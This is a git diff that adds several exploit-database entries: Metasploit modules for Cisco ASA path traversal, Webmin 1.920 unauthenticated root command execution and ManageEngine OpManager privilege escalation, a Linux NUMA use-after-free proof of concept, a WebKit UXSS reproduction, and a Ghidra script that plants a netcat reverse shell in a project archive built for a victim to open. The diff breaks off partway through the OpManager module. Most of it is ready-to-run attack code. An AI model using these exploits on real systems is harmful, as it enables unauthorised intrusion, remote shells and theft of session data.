diff --git a/exploits/hardware/webapps/47220.rb b/exploits/hardware/webapps/47220.rb
new file mode 100755
index 000000000..9b2bddf82
--- /dev/null
+++ b/exploits/hardware/webapps/47220.rb
@@ -0,0 +1,115 @@
+require 'msf/core'
+
+  class MetasploitModule < Msf::Auxiliary
+
+    include Msf::Exploit::Remote::HttpClient
+
+        def initialize(info={})
+      super(update_info(info,
+          'Name'           => "Cisco Adaptive Security Appliance  - Path Traversal",
+          'Description'    => %q{
+            Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
+        A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
+        Google Dork:inurl:+CSCOE+/logon.html
+          },
+          'License'        => MSF_LICENSE,
+          'Author'         =>
+        [
+            'Yassine Aboukir',   #Initial  discovery
+            'Angelo Ruwantha @h3llwings'      #msf module
+        ],
+          'References'     =>
+        [
+            ['EDB', '44956'],
+            ['URL', 'https://www.exploit-db.com/exploits/44956/']
+        ],
+          'Arch'           => ARCH_CMD,
+         'Compat'          =>
+        {
+            'PayloadType' => 'cmd'
+        },
+          'Platform'       => ['unix','linux'],
+          'Targets'        =>
+        [
+            ['3000 Series Industrial Security Appliance (ISA)
+          ASA 1000V Cloud Firewall
+          ASA 5500 Series Adaptive Security Appliances
+          ASA 5500-X Series Next-Generation Firewalls
+          ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
+          Adaptive Security Virtual Appliance (ASAv)
+          Firepower 2100 Series Security Appliance
+          Firepower 4100 Series Security Appliance
+          Firepower 9300 ASA Security Module
+          FTD Virtual (FTDv)', {}]
+        ],
+          'Privileged'     => false,
+          'DefaultTarget'  => 0))
+
+        register_options(
+        [
+          OptString.new('TARGETURI', [true, 'Ex: https://vpn.example.com', '/']),
+          OptString.new('SSL', [true, 'set it as true', 'true']),
+          OptString.new('RPORT', [true, '443', '443']),
+        ], self.class)
+    end
+
+
+    def run
+      uri = target_uri.path
+
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'),
+        
+      })
+ 
+
+      if res && res.code == 200 && res.body.include?("{'name'")
+        print_good("#{peer} is Vulnerable")
+        print_status("Directory Index ")
+        print_good(res.body)
+             res_dir = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'),
+        
+        })
+        res_users = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'),
+        
+        })
+        userIDs=res_users.body.scan(/[0-9]\w+/).flatten
+        
+        print_status("CSCEO Directory ") 
+        print_good(res_dir.body)
+    
+        print_status("Active Session(s) ")
+        print_status(res_users.body)
+        x=0
+        begin
+        print_status("Getting User(s)")
+        while (x<=userIDs.length)
+          users = send_request_cgi({
+          'method'   => 'GET',
+          'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'+userIDs[x]),
+          
+          })
+         
+          grab_username=users.body.scan(/user:\w+/)
+          nonstr=grab_username
+          if (!nonstr.nil? && nonstr!="")
+            print_good("#{nonstr}")
+          end
+          x=x+1
+        end
+        rescue
+          print_status("Complete")
+        end
+         
+         
+      else
+        print_error("safe")
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
\ No newline at end of file
diff --git a/exploits/linux/dos/47236.c b/exploits/linux/dos/47236.c
new file mode 100644
index 000000000..961176724
--- /dev/null
+++ b/exploits/linux/dos/47236.c
@@ -0,0 +1,265 @@
+/*
+On NUMA systems, the Linux fair scheduler tracks information related to NUMA
+faults in task_struct::numa_faults and task_struct::numa_group. Both of these
+have broken object lifetimes.
+
+Since commit 82727018b0d3 ("sched/numa: Call task_numa_free() from do_execve()",
+first in v3.13), ->numa_faults is freed not only when the last reference to the
+task_struct is gone, but also after successful execve(). However,
+show_numa_stats() (reachable through /proc/$pid/sched) locklessly reads data
+from ->numa_faults (use-after-free read) and prints it to a userspace buffer.
+
+To test this, I used a QEMU VM with the following NUMA configuration:
+
+    -m 8192 -smp cores=4 -numa node,nodeid=0 -numa node,nodeid=1
+
+Test code is attached; it takes a while before it triggers the bug since the
+race window is pretty small.
+
+KASAN report:
+============================
+[  909.461282] ==================================================================
+[  909.464502] BUG: KASAN: use-after-free in show_numa_stats+0x99/0x160
+[  909.465250] Read of size 8 at addr ffff8880ac8f8f00 by task numa_uaf/18471
+
+[  909.466167] CPU: 0 PID: 18471 Comm: numa_uaf Not tainted 5.2.0-rc7 #443
+[  909.466877] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
+[  909.467751] Call Trace:
+[  909.468072]  dump_stack+0x7c/0xbb
+[  909.468413]  ? show_numa_stats+0x99/0x160
+[  909.468879]  print_address_description+0x6e/0x2a0
+[  909.469419]  ? show_numa_stats+0x99/0x160
+[  909.469828]  ? show_numa_stats+0x99/0x160
+[  909.470292]  __kasan_report+0x149/0x18d
+[  909.470683]  ? show_numa_stats+0x99/0x160
+[  909.471137]  kasan_report+0xe/0x20
+[  909.471533]  show_numa_stats+0x99/0x160
+[  909.471988]  proc_sched_show_task+0x6ae/0x1e60
+[  909.472467]  sched_show+0x6a/0xa0
+[  909.472836]  seq_read+0x197/0x690
+[  909.473264]  vfs_read+0xb2/0x1b0
+[  909.473616]  ksys_pread64+0x74/0x90
+[  909.474034]  do_syscall_64+0x5d/0x260
+[  909.474975]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
+[  909.475512] RIP: 0033:0x7f6f57742987
+[  909.475878] Code: 35 39 a4 09 00 48 8d 3d d1 a4 09 00 e8 52 77 f4 ff 66 90 48 8d 05 79 7d 0d 00 49 89 ca 8b 00 85 c0 75 10 b8 11 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 59 c3 41 55 49 89 cd 41 54 49 89 d4 55 48 89
+[  909.477905] RSP: 002b:00005565fc10d108 EFLAGS: 00000246 ORIG_RAX: 0000000000000011
+[  909.478684] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6f57742987
+[  909.479393] RDX: 0000000000001000 RSI: 00005565fc10d120 RDI: 0000000000000005
+[  909.480254] RBP: 00005565fc10e130 R08: 00007f6f57657740 R09: 00007f6f57657740
+[  909.481037] R10: 0000000000000000 R11: 0000000000000246 R12: 00005565fbf0b1f0
+[  909.481821] R13: 00007ffe60338770 R14: 0000000000000000 R15: 0000000000000000
+
+[  909.482744] Allocated by task 18469:
+[  909.483135]  save_stack+0x19/0x80
+[  909.483475]  __kasan_kmalloc.constprop.3+0xa0/0xd0
+[  909.483957]  task_numa_fault+0xff2/0x1d30
+[  909.484414]  __handle_mm_fault+0x94f/0x1320
+[  909.484887]  handle_mm_fault+0x7e/0x100
+[  909.485323]  __do_page_fault+0x2bb/0x610
+[  909.485722]  async_page_fault+0x1e/0x30
+
+[  909.486355] Freed by task 18469:
+[  909.486687]  save_stack+0x19/0x80
+[  909.487027]  __kasan_slab_free+0x12e/0x180
+[  909.487497]  kfree+0xd8/0x290
+[  909.487805]  __do_execve_file.isra.41+0xf1e/0x1140
+[  909.488316]  __x64_sys_execve+0x4f/0x60
+[  909.488706]  do_syscall_64+0x5d/0x260
+[  909.489144]  entry_SYSCALL_64_after_hwframe+0x49/0xbe
+
+[  909.490121] The buggy address belongs to the object at ffff8880ac8f8f00
+                which belongs to the cache kmalloc-128 of size 128
+[  909.491564] The buggy address is located 0 bytes inside of
+                128-byte region [ffff8880ac8f8f00, ffff8880ac8f8f80)
+[  909.492919] The buggy address belongs to the page:
+[  909.493445] page:ffffea0002b23e00 refcount:1 mapcount:0 mapping:ffff8880b7003500 index:0xffff8880ac8f8d80
+[  909.494419] flags: 0x1fffc0000000200(slab)
+[  909.494836] raw: 01fffc0000000200 ffffea0002cec780 0000000900000009 ffff8880b7003500
+[  909.495633] raw: ffff8880ac8f8d80 0000000080150011 00000001ffffffff 0000000000000000
+[  909.496451] page dumped because: kasan: bad access detected
+
+[  909.497291] Memory state around the buggy address:
+[  909.497775]  ffff8880ac8f8e00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
+[  909.498546]  ffff8880ac8f8e80: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
+[  909.499319] >ffff8880ac8f8f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
+[  909.500034]                    ^
+[  909.500429]  ffff8880ac8f8f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[  909.501150]  ffff8880ac8f9000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
+[  909.501942] ==================================================================
+[  909.502712] Disabling lock debugging due to kernel taint
+============================
+
+
+->numa_group is a refcounted reference with RCU semantics, but the RCU helpers
+are used inconsistently. In particular, show_numa_stats() reads from
+p->numa_group->faults with no protection against concurrent updates.
+
+There are also various other places across the scheduler that use ->numa_group
+without proper protection; e.g. as far as I can tell,
+sched_tick_remote()->task_tick_fair()->task_tick_numa()->task_scan_start()
+reads from p->numa_group protected only by the implicit read-side critical
+section that spinlocks currently imply by disabling preemption, and with no
+protection against the pointer unexpectedly becoming NULL.
+
+
+I am going to send suggested fixes in a minute, but I think the approach for
+->numa_group might be a bit controversial. The approach I'm taking is:
+
+ - For ->numa_faults, just wipe the statistics instead of freeing them.
+ - For ->numa_group, use proper RCU accessors everywhere.
+
+Annoyingly, if one of the RCU accessors detects a problem (with
+CONFIG_PROVE_LOCKING=y), it uses printk, and if the wrong runqueue lock is held
+at that point, a deadlock might happen, which isn't great. To avoid that, the
+second patch adds an ugly hack in printk that detects potential runqueue
+deadlocks if lockdep is on. I'm not sure how you all are going to feel about
+that one - maybe it's better to just leave it out, or do something different
+there? I don't know...
+
+I'm sending the suggested patches off-list for now; if you want me to resend
+them publicly, just say so.
+*/
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdio.h>
+#include <numaif.h>
+#include <sched.h>
+#include <err.h>
+#include <time.h>
+#include <fcntl.h>
+#include <signal.h>
+#include <sys/prctl.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/uio.h>
+#include <sys/syscall.h>
+#include <linux/userfaultfd.h>
+
+int sched_fd;
+
+int get_scan_seq(void) {
+  char buf[0x1000];
+  ssize_t buflen = pread(sched_fd, buf, sizeof(buf)-1, 0);
+  if (buflen == -1) err(1, "read sched");
+  buf[buflen] = '\0';
+  char *p = strstr(buf, "numa_scan_seq");
+  if (!p) errx(1, "no numa_scan_seq");
+  *strchrnul(p, '\n') = '\0';
+  p = strpbrk(p, "0123456789");
+  if (!p) errx(1, "no numa_scan_seq");
+  return atoi(p);
+}
+
+void reexec(char *arg0) {
+  char *argv[] = {arg0, NULL};
+  execvp("/proc/self/exe", argv);
+  err(1, "reexec");
+}
+
+volatile int uaf_child_ready = 0;
+static int sfd_uaf(void *fd_) {
+  int fd = (int)(long)fd_;
+/*
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  if (getppid() == 1) raise(SIGKILL);
+*/
+
+  while (1) {
+    char buf[0x1000];
+    ssize_t res = pread(fd, buf, sizeof(buf)-1, 0);
+    if (res == -1) {
+      if (errno == ESRCH) _exit(0);
+      err(1, "pread");
+    }
+    buf[res] = '\0';
+    puts(buf);
+    uaf_child_ready = 1;
+  }
+}
+
+int main(int argc, char **argv) {
+  if (strcmp(argv[0], "die") == 0) {
+    _exit(0);
+  }
+  sched_fd = open("/proc/self/sched", O_RDONLY|O_CLOEXEC);
+  if (sched_fd == -1) err(1, "open sched");
+
+  // allocate two pages at the lowest possible virtual address so that the first periodic memory fault is scheduled on the first page
+  char *page = mmap((void*)0x1000, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
+  if (page == MAP_FAILED) err(1, "mmap");
+  *page = 'a';
+
+  // handle the second page with uffd
+  int ufd = syscall(__NR_userfaultfd, 0);
+  if (ufd == -1) err(1, "userfaultfd");
+  struct uffdio_api api = { .api = UFFD_API, .features = 0 };
+  if (ioctl(ufd, UFFDIO_API, &api)) err(1, "uffdio_api");
+  struct uffdio_register reg = {
+    .mode = UFFDIO_REGISTER_MODE_MISSING,
+    .range = { .start = (__u64)page+0x1000, .len = 0x1000 }
+  };
+  if (ioctl(ufd, UFFDIO_REGISTER, &reg))
+    err(1, "uffdio_register");
+
+  // make sure that the page is on the CPU-less NUMA node
+  unsigned long old_nodes = 0x1;
+  unsigned long new_nodes = 0x2;
+  if (migrate_pages(0, sizeof(unsigned long), &old_nodes, &new_nodes)) err(1, "migrate_pages");
+
+  // trigger userfault in child
+  pid_t uffd_child = fork();
+  if (uffd_child == -1) err(1, "fork");
+  if (uffd_child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+    struct iovec iov = { .iov_base = (void*)0x1fff, .iov_len = 2 };
+    process_vm_readv(getppid(), &iov, 1, &iov, 1, 0);
+    err(1, "process_vm_readv returned");
+  }
+  sleep(1);
+
+  int ini_seq = get_scan_seq();
+  printf("initial scan_seq: %d\n", ini_seq);
+  if (ini_seq) reexec("m");
+
+  // wait for a migration
+  time_t start_time = time(NULL);
+  while (1) {
+    if (time(NULL) > start_time + 30) {
+      puts("no migration detected!");
+      reexec("m");
+    }
+    int cur_seq = get_scan_seq();
+    if (cur_seq != 0) {
+      printf("new scan_seq: %d\n", cur_seq);
+      goto migration_done;
+    }
+  }
+
+migration_done:
+  printf("migration done after %d seconds\n", (int)(time(NULL)-start_time));
+  while (1) {
+    pid_t pid = fork();
+    if (pid == -1) err(1, "fork");
+    if (pid == 0) {
+      static char uaf_stack[1024*1024];
+      static char uaf_stack2[1024*1024];
+      int sfd = open("/proc/self/sched", O_RDONLY);
+      if (sfd == -1) err(1, "open sched");
+      pid_t uaf_child = clone(sfd_uaf, uaf_stack+sizeof(uaf_stack), CLONE_FILES|CLONE_VM, (void*)(long)sfd);
+      if (uaf_child == -1) err(1, "clone uaf_child");
+      uaf_child = clone(sfd_uaf, uaf_stack2+sizeof(uaf_stack2), CLONE_FILES|CLONE_VM, (void*)(long)sfd);
+      if (uaf_child == -1) err(1, "clone uaf_child");
+      while (!uaf_child_ready) __builtin_ia32_pause();
+      *(volatile char *)page = 'b';
+      reexec("die");
+    }
+    int status;
+    if (wait(&status) != pid) err(1, "wait");
+  }
+}
\ No newline at end of file
diff --git a/exploits/linux/local/47231.py b/exploits/linux/local/47231.py
new file mode 100755
index 000000000..4a486a4b1
--- /dev/null
+++ b/exploits/linux/local/47231.py
@@ -0,0 +1,60 @@
+import os
+import inspect
+import argparse
+import shutil
+from shutil import copyfile
+
+print("")
+print("")
+print("################################################")
+print("")
+print("------------------CVE-2019-13623----------------")
+print("")
+print("################################################")
+print("")
+print("-----------------Ghidra-Exploit-----------------")
+print("--Tested version: Ghidra Linux version <= 9.0.4-")
+print("------------------------------------------------")
+print("")
+print("################################################")
+print("")
+print("----------Exploit by: Etienne Lacoche-----------")
+print("---------Contact Twitter: @electr0sm0g----------")
+print("")
+print("------------------Discovered by:----------------")
+print("---------https://blog.fxiao.me/ghidra/----------")
+print("")
+print("--------Exploit tested on Ubuntu 18.04----------")
+print("-----------------Dependency: zip----------------")
+print("")
+print("################################################")
+print("")
+print("")
+
+parser = argparse.ArgumentParser()
+parser.add_argument("file", help="Path to input export .gar file",default=1)
+parser.add_argument("ip", help="Ip to nc listener",default=1)
+parser.add_argument("port", help="Port to nc listener",default=1)
+
+args = parser.parse_args()
+            
+if args.ip and args.port and args.file:
+
+    rootDirURL=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
+    path = "../Ghidra/Features/Decompiler/os/linux64/decompile"
+    os.system("mkdir -p ../Ghidra/Features/Decompiler/os/linux64/")
+    os.system("echo 'rm -f x; mknod x p && nc "+args.ip+" "+args.port+" 0<x | /bin/bash 1>x' > decompile")
+    os.system("chmod +x decompile")
+    copyfile("decompile",path)
+    copyfile(args.file,rootDirURL+"/"+"project.gar")
+    os.system("zip -q project.gar ../Ghidra/Features/Decompiler/os/linux64/decompile")
+    os.system("echo 'To fully export this archive, place project.gar to GHIDRA_INSTALL_DIR root path and open it with Restore Project at Ghidra.' > README_BEFORE_OPEN_GAR_FILE")
+    os.system("zip -q project.zip README_BEFORE_OPEN_GAR_FILE")    
+    os.system("zip -q project.zip project.gar") 
+    os.system("rm decompile README_BEFORE_OPEN_GAR_FILE")
+    os.system("rm project.gar")
+    print("You can now share project.zip and start your local netcat listener.")
+    print("")
+    print("Project.gar must be placed and opened by victim at GHIDRA_INSTALL_DIR")
+    print("root path for payload execution.")
+    print("")
\ No newline at end of file
diff --git a/exploits/linux/remote/47230.rb b/exploits/linux/remote/47230.rb
new file mode 100755
index 000000000..800821c83
--- /dev/null
+++ b/exploits/linux/remote/47230.rb
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Webmin 1.920 Unauthenticated RCE',
+      'Description'    => %q(
+        This module exploits an arbitrary command execution vulnerability in Webmin
+        1.920 and prior versions. If the password change module is turned on, the unathenticated user
+        can execute arbitrary commands with root privileges.
+		
+        /////// This 0day has been published at DEFCON-AppSec Village. ///////		
+
+      ),
+      'Author'         => [
+        'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-'],
+          ['URL', 'https://www.pentest.com.tr']
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 512,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'RPORT' => 10000,
+          'SSL'   => false,
+          'PAYLOAD' => 'cmd/unix/reverse_python'
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Webmin <= 1.910', {}]],
+      'DisclosureDate' => 'May 16 2019',
+      'DefaultTarget'  => 0)
+    )
+    register_options [
+        OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
+    ]
+  end
+
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+  ##
+  # Target and input verification
+  ##
+  def check
+    # check passwd change priv
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path, "password_change.cgi"),
+      'headers' =>
+        {
+          'Referer' => "#{peer}/session_login.cgi"
+        },
+      'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1"
+    })
+
+    if res && res.code == 200 && res.body =~ /Failed/
+      res = send_request_cgi(
+        {
+        'method' => 'POST',
+        'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
+        'ctype'  => 'application/x-www-form-urlencoded',
+        'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
+        'headers' =>
+          {
+            'Referer' => "#{peer}/session_login.cgi"
+          },
+        'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"        
+        })
+
+      if res && res.code == 200 && res.body =~ /password_change.cgi/
+        return CheckCode::Vulnerable
+      else
+        return CheckCode::Safe
+      end
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  ##
+  # Exploiting phase
+  ##
+  def exploit
+
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    command = payload.encoded
+    print_status("Attempting to execute the payload...")
+    handler
+    res = send_request_cgi(
+      {
+      'method' => 'POST',
+      'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
+      'ctype'  => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
+      'headers' =>
+        {
+          'Referer' => "#{peer}/session_login.cgi"
+        },
+      'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
+      })
+
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/dos/47237.txt b/exploits/multiple/dos/47237.txt
new file mode 100644
index 000000000..6698762b5
--- /dev/null
+++ b/exploits/multiple/dos/47237.txt
@@ -0,0 +1,138 @@
+VULNERABILITY DETAILS
+https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/xml/XSLTProcessor.cpp#L66
+```
+Ref<Document> XSLTProcessor::createDocumentFromSource(const String& sourceString,
+    const String& sourceEncoding, const String& sourceMIMEType, Node* sourceNode, Frame* frame)
+{
+    Ref<Document> ownerDocument(sourceNode->document());
+    bool sourceIsDocument = (sourceNode == &ownerDocument.get());
+    String documentSource = sourceString;
+
+    RefPtr<Document> result;
+    if (sourceMIMEType == "text/plain") {
+        result = XMLDocument::createXHTML(frame, sourceIsDocument ? ownerDocument->url() : URL());
+        transformTextStringToXHTMLDocumentString(documentSource);
+    } else
+        result = DOMImplementation::createDocument(sourceMIMEType, frame, sourceIsDocument ? ownerDocument->url() : URL());
+
+    // Before parsing, we need to save & detach the old document and get the new document
+    // in place. We have to do this only if we're rendering the result document.
+    if (frame) {
+[...]
+        frame->setDocument(result.copyRef());
+    }
+
+    auto decoder = TextResourceDecoder::create(sourceMIMEType);
+    decoder->setEncoding(sourceEncoding.isEmpty() ? UTF8Encoding() : TextEncoding(sourceEncoding), TextResourceDecoder::EncodingFromXMLHeader);
+    result->setDecoder(WTFMove(decoder));
+
+    result->setContent(documentSource);
+```
+
+https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/page/Frame.cpp#L248
+```
+void Frame::setDocument(RefPtr<Document>&& newDocument)
+{
+    ASSERT(!newDocument || newDocument->frame() == this);
+
+    if (m_documentIsBeingReplaced) // ***1***
+        return;
+
+    m_documentIsBeingReplaced = true;
+
+[...]
+
+    if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
+        m_doc->prepareForDestruction(); // ***2***
+
+    m_doc = newDocument.copyRef();
+```
+
+`setDocument` calls `Document::prepareForDestruction`, which might trigger JavaScript execution via
+a nested frame's "unload" event handler. Therefore the `m_documentIsBeingReplaced` flag has been
+introduced to avoid reentrant calls. The problem is that by the time `setDocument` is called,
+`newDocument` might already have a reference to a `Frame` object, and if the method returns early,
+that reference will never get cleared by subsequent navigations. It's not possible to trigger
+document replacement inside `setDocument` via a regular navigation request or a 'javascript:' URI
+load; however, an attacker can use an XSLT transformation for that.
+
+When the attacker has an extra document attached to a frame, they can navigate the frame to a
+cross-origin page and issue a form submission request to a 'javascript:' URI using the extra
+document to trigger UXSS.
+
+VERSION
+WebKit revision 245321.
+It should affect the stable branch as well, but the test case crashes Safari 12.1.1 (14607.2.6.1.1).
+
+REPRODUCION CASE
+repro.html:
+```
+<body>
+<script>
+createFrame = doc => doc.body.appendChild(document.createElement('iframe'));
+
+pi = document.createProcessingInstruction('xml-stylesheet',
+  'type="text/xml" href="stylesheet.xml"');
+cache_frame = createFrame(document);
+cache_frame.contentDocument.appendChild(pi);
+
+setTimeout(() => {
+  victim_frame = createFrame(document);
+  child_frame_1 = createFrame(victim_frame.contentDocument);
+  child_frame_1.contentWindow.onunload = () => {
+    victim_frame.src = 'javascript:""';
+    try {
+      victim_frame.contentDocument.appendChild(document.createElement('html')).
+        appendChild(document.createElement('body'));
+    } catch { }
+    
+    child_frame_2 = createFrame(victim_frame.contentDocument);
+    child_frame_2.contentWindow.onunload = () => {
+      doc = victim_frame.contentDocument;
+      doc.write('foo');
+      doc.firstChild.remove();
+
+      doc.appendChild(pi);
+      doc.appendChild(doc.createElement('root'));
+
+      doc.close();
+    }
+  }
+
+  victim_frame.src = 'javascript:""';
+
+  if (child_frame_1.xslt_script_run) {
+    victim_frame.src = 'http://example.com/';
+    victim_frame.onload = () => {
+      form = corrupted_doc.createElement('form');
+      form.action = 'javascript:alert(document.body.innerHTML)';
+      form.submit();
+    }
+  }
+}, 2000);
+</script>
+</body> 
+
+```
+
+stylesheet.xml:
+```
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+<xsl:template match="/">
+<html>
+<body>
+<script>
+<![CDATA[
+document.body.lastChild.xslt_script_run = true;
+]]>
+</script>
+<iframe src="javascript:top.corrupted_doc = frameElement.ownerDocument; frameElement.remove();"></iframe>
+</body>
+</html>
+</xsl:template>
+</xsl:stylesheet>
+
+```
+
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero
\ No newline at end of file
diff --git a/exploits/multiple/remote/47227.rb b/exploits/multiple/remote/47227.rb
new file mode 100755
index 000000000..fbe2778e0
--- /dev/null
+++ b/exploits/multiple/remote/47227.rb
@@ -0,0 +1,408 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+ 
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution",
+      'Description'    => %q(
+        This module exploits sqli and command injection vulnerability in the OpManager v12.4.034 and prior versions.
+ 
+        Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides privilege escalation.
+        Therefore low authority user can gain the authority of "system" on the server. 
+        It uploads malicious file using the "Execute Program Action(s)" feature of Application Manager Plugin.
+
+        /////// This 0day has been published at DEFCON-AppSec Village. ///////
+
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-OpManager-v12-4-Privilege-Escalation-Remote-Command-Execution.html' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 60,
+          'RPORT' => 8060,
+          'SSL' => false,
+          'PAYLOAD' => 'generic/shell_reverse_tcp'
+        },
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'Platform'       => ['unix', 'win'],
+      'Targets' =>
+        [
+          [ 'Windows Target',
+            {
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD,
+            }
+          ],
+          [ 'Linux Target',
+            {
+              'Platform' => ['unix'],
+              'Arch' => ARCH_CMD,
+              'Payload' =>
+                {
+                  'Compat' =>
+                    {
+                      'PayloadType' => 'cmd',
+                    }
+                }
+            }
+          ]
+        ],
+      'DisclosureDate' => '10 August 2019 //DEFCON',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'OpManager Username']),
+        OptString.new('PASSWORD',  [true, 'OpManager Password']),
+        OptString.new('TARGETURI',  [true, 'Base path for ME application', '/'])
+      ],self.class)
+  end
+
+  def check_platform(host, port, cookie)
+
+    res = send_request_cgi(
+      'rhost'   => host,
+      'rport'   => port,
+      'method'  => 'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
+      'cookie'  => cookie,
+      'vars_get' => {
+        'TileName' => '.ExecProg',
+        'haid' => 'null',
+      }
+    )
+    if res && res.code == 200 && res.body.include?('createExecProgAction')
+      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
+      if @dir =~ /:/
+        platform = Msf::Module::Platform::Windows
+      else 
+        platform = Msf::Module::Platform::Unix
+      end
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+    end
+    file_up(host, port, cookie, platform, @dir)
+  end
+
+  def file_up(host, port, cookie, platform, dir)
+    if platform == Msf::Module::Platform::Windows
+      filex = ".bat"
+    else
+      if payload.encoded =~ /sh/
+        filex = ".sh"
+      elsif payload.encoded =~ /perl/
+        filex = ".pl"
+      elsif payload.encoded =~ /awk 'BEGIN{/
+        filex = ".sh"
+      elsif payload.encoded =~ /python/
+        filex = ".py"
+      elsif payload.encoded =~ /ruby/
+        filex = ".rb"
+      else
+        fail_with(Failure::Unknown, 'Payload type could not be checked!')
+      end
+    end
+ 
+    @fname= rand_text_alpha(9 + rand(3)) + filex
+    data = Rex::MIME::Message.new
+    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+ 
+    res = send_request_cgi({
+      'rhost'   => host,
+      'rport'   => port,
+      'method' => 'POST',    
+      'data'  => data.to_s,
+      'agent' => 'Mozilla',
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri, "Upload.do")     
+    })
+ 
+    if res && res.code == 200 && res.body.include?('icon_message_success')
+      print_good("#{@fname} malicious file has been uploaded.")
+      create_exec_prog(host, port, cookie, dir, @fname)
+    else
+      fail_with(Failure::Unknown, 'The file could not be uploaded!')
+    end
+  end
+
+  def create_exec_prog(host, port, cookie, dir, fname)
+ 
+    @display = rand_text_alphanumeric(7)
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'rhost'   => host,
+      'rport'   => port,
+      'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
+      'cookie'  => cookie,
+      'vars_post' => {
+        'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+        'method' => 'createExecProgAction',
+        'id' => 0,
